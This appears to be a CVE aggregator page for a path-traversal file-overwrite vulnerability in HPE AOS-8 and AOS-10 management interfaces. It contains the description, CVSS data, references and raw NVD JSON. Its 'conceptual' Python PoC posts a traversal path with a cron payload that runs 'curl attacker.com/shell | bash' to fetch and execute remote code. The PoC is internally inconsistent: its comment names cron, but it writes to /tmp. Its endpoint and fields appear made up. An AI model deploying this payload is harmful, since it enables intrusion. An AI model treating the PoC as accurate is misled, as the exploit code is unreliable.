CVE-2026-44852

Description

An authenticated remote code execution vulnerability exists in the AOS-8 and AOS-10 web-based management interface. A vulnerability in the certificate download functionality could allow an authenticated remote attacker to overwrite arbitrary files on the underlying operating system by exploiting improper input validation in the file path parameter. Successful exploitation could allow the attacker to execute arbitrary commands on the underlying operating system as a privileged user.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

HPE AOS-8

HPE AOS-10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-44852 (Conceptual)
# This script demonstrates the path traversal vulnerability in the certificate download functionality.
# Requires high privileges.

import requests

def exploit(target, username, password):
    session = requests.Session()
    # 1. Authenticate
    login_url = f"{target}/login"
    creds = {"username": username, "password": password}
    session.post(login_url, data=creds)

    # 2. Exploit Arbitrary File Overwrite via Certificate Download
    # The vulnerable endpoint accepts a 'file_path' parameter
    exploit_url = f"{target}/api/cert/download"
    
    # Payload to write to a sensitive location (e.g., cron or startup script)
    # Using path traversal to escape the web root
    malicious_path = "../../../../../../tmp/malicious_config.txt"
    
    payload_data = {
        "file_path": malicious_path,
        "content": "* * * * * root /bin/bash -c 'curl attacker.com/shell | bash'"
    }
    
    response = session.post(exploit_url, data=payload_data)
    
    if response.status_code == 200:
        print("[+] File overwrite potentially successful.")
    else:
        print("[-] Exploit failed.")

# Usage: exploit("https://target-ip", "admin", "admin")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44852
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44852
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44852/
[4] VulDB https://vuldb.com/cve/CVE-2026-44852
[5] https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44852", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:43.803", "lastModified": "2026-05-12T20:16:43.803", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authenticated remote code execution vulnerability exists in the AOS-8 and AOS-10 web-based management interface. A vulnerability in the certificate download functionality could allow an authenticated remote attacker to overwrite arbitrary files on the underlying operating system by exploiting improper input validation in the file path parameter. Successful exploitation could allow the attacker to execute arbitrary commands on the underlying operating system as a privileged user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US", "source": "[email protected]"}]}}